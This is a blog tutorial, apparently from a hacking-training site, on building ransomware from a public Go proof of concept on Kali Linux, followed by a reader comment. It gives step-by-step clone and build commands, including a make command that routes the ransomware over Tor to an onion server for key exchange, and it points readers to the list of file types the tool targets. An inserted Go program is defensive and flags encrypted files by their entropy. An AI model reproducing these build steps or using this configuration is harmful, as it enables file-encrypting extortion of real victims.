By otw

Ransomware: Build Your Own Ransomware, Part 1

Welcome back, my aspiring cyberwarriors!


Ransomware is rapidly becoming the most important form of malware afflicting our digital systems. Companies across the globe are being hit with various forms of malware, including the new variant, Snake, designed specifically for SCADA/ICS systems. The Colonial Pipeline in the US was shut down for nearly a week before paying a $5 million ransom, demonstrating the danger of this ransomware to industrial systems and a nation's infrastructure. Recently, the major US insurance company, CNA, admitted to having paid a ransom of $40 million! No wonder ransomware developers are getting more and more creative and malicious: ransomware pays!





To better understand how ransomware works, let's build our own ransomware from a Proof of Concept (POC) available from mauri870 on github.com. He developed this ransomware as part of his academic program; it is not designed for malicious purposes but rather to help us understand how ransomware works. Like the new variant, Snake, and a growing number of malware strains, this malware is written in Golang.


This malware encrypts the victim's files in the background with AES-256-CTR and uses RSA-4096 to secure the key exchange with the server. This ransomware is very similar to Cryptolocker, one of the most successful ransomware attacks in history.
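A consequence of the AES-256-CTR step described above is useful to defenders: once a file has been encrypted, its bytes are statistically indistinguishable from random, so its Shannon entropy sits near 8 bits per byte, while ordinary documents sit far lower. The following Go program is an added example written for this article; it is not code from the post or from mauri870's project. It encrypts a constructed plaintext in memory with AES-256-CTR (fixed demonstration key and IV, chosen here purely to show what that mode's output looks like), measures the entropy of both, and walks a directory flagging files whose leading bytes look encrypted. The 7.5 bits/byte threshold and the 1 KiB minimum sample are assumptions made for this example, not values from the post.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
	"io"
	"io/fs"
	"math"
	"os"
	"path/filepath"
)

// ShannonEntropy returns the entropy of data in bits per byte (0 to 8).
func ShannonEntropy(data []byte) float64 {
	if len(data) == 0 {
		return 0
	}
	var counts [256]int
	for _, b := range data {
		counts[b]++
	}
	n := float64(len(data))
	var h float64
	for _, c := range counts {
		if c == 0 {
			continue
		}
		p := float64(c) / n
		h -= p * math.Log2(p)
	}
	return h
}

// EncryptedThreshold is an assumed cut-off: AES output sits near 8 bits/byte,
// text, source and most office documents sit well below 7.5.
const EncryptedThreshold = 7.5

// MinSample is the smallest sample we judge; short random samples
// underestimate entropy (256 random bytes average only ~7.3 bits/byte).
const MinSample = 1024

// IsLikelyEncrypted reports whether data has ciphertext-like entropy.
func IsLikelyEncrypted(data []byte) bool {
	return ShannonEntropy(data) > EncryptedThreshold
}

// SamplePlaintext is a constructed, low-entropy document of about 4 KiB.
func SamplePlaintext() []byte {
	return bytes.Repeat([]byte("Quarterly report: revenue, costs and headcount by region.\n"), 70)
}

// SampleCiphertext encrypts plaintext in memory with AES-256-CTR using a
// fixed demonstration key and zero IV (constructed for this example only).
func SampleCiphertext(plaintext []byte) []byte {
	key := bytes.Repeat([]byte{0x42}, 32) // 32-byte key selects AES-256
	iv := make([]byte, aes.BlockSize)
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	out := make([]byte, len(plaintext))
	cipher.NewCTR(block, iv).XORKeyStream(out, plaintext)
	return out
}

// ScanDir walks root and returns regular files whose first sampleSize bytes
// look encrypted. A sudden jump in this count across user data is the kind
// of signal a defender would alert on.
func ScanDir(root string, sampleSize int) ([]string, error) {
	var flagged []string
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, walkErr error) error {
		if walkErr != nil {
			return walkErr
		}
		if !d.Type().IsRegular() {
			return nil
		}
		f, err := os.Open(path)
		if err != nil {
			return err
		}
		defer f.Close()
		buf, err := io.ReadAll(io.LimitReader(f, int64(sampleSize)))
		if err != nil {
			return err
		}
		if len(buf) >= MinSample && IsLikelyEncrypted(buf) {
			flagged = append(flagged, path)
		}
		return nil
	})
	return flagged, err
}

func main() {
	plain := SamplePlaintext()
	ct := SampleCiphertext(plain)
	fmt.Printf("plaintext entropy:  %.2f bits/byte (encrypted? %v)\n", ShannonEntropy(plain), IsLikelyEncrypted(plain))
	fmt.Printf("ciphertext entropy: %.2f bits/byte (encrypted? %v)\n", ShannonEntropy(ct), IsLikelyEncrypted(ct))
}
```

Entropy is a triage signal, not proof: already-compressed formats (ZIP, JPEG, many PDF streams) also score near 8, so in practice the check is combined with file-type magic bytes and with the rate of change, since ransomware rewrites many files in a short window.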


Step #1: Download and Install the Binaries


The first step is to fire up your Kali and make certain that golang is installed. If not, install it from the Kali repositories by entering:


kali > sudo apt install golang


Next, you will need to log in as the root user.


kali > sudo su -


Now create a directory for the binaries. In this case, I named it simply "git".


kali > mkdir git


Next, change directory (cd) to this directory.


kali > cd git


Next, clone the repository from github.com.


kali > git clone https://github.com/mauri870/ransomware



Step #2: Export GO Environment variables


Next, we need to set and export some environment variables so that GO and the build can find the appropriate directories.




Step #3: Make the source code dependencies


Now, with the variables set and exported, we need to make the dependencies. Navigate to the new directory, ransomware, and enter make deps.


kali > cd ransomware


kali > make deps




Step #4: Make the Source Code with options


Now that the dependencies are built, we can begin to make the source code. In our case, we will use a few options.


First, we want to route our communications over the Tor network.


USE_TOR=true


Second, we want to use our dark web server at hackersarisegtdj.onion (you can use any domain or localhost).


SERVER_HOST=hackersarisegtdj.onion


Third, we want to use port 80 (you can use any port).


SERVER_PORT=80


Finally, we want to set the target operating system for the build, in this case, Linux.


GOOS=linux


Our command should look something like this:


kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux


Now hit ENTER and watch your ransomware compile.


Step #5: Check the Directory for ransomware.exe


Once the build has completed, do a long listing of the ransomware directory.


kali > ls -l

Now, navigate to the bin directory.


kali > cd bin

Here, you will see the three build products: ransomware.exe, server and unlocker.exe.


Step #6: Examine the Types of Files to be Encrypted


If you want to see what types of files this ransomware will encrypt, navigate to the cmd directory and open common.go.


kali > cd cmd


kali > more common.go


Here, you can see the list of file extensions that this ransomware will target for encryption when executed.



Summary


Ransomware is probably the greatest threat to our digital systems at this moment. As the Colonial Pipeline attack clearly demonstrated, nearly everyone is vulnerable, and if SCADA/ICS systems are compromised there can be significant economic and infrastructure ramifications!


This ransomware POC will help you to better understand ransomware as a threat and to test whether your systems are vulnerable to such an attack.


In the second part of this series, we will test this ransomware on a Windows VM.


If you or your team want to learn more about ransomware, our Ransomware training videos are available in our online store.








Comments



Thanks very much, sir. This will help me in my college project for sure; I was looking for content like this. Can you write how to safely run it on Windows and make it normal again without any damage, please, sir?
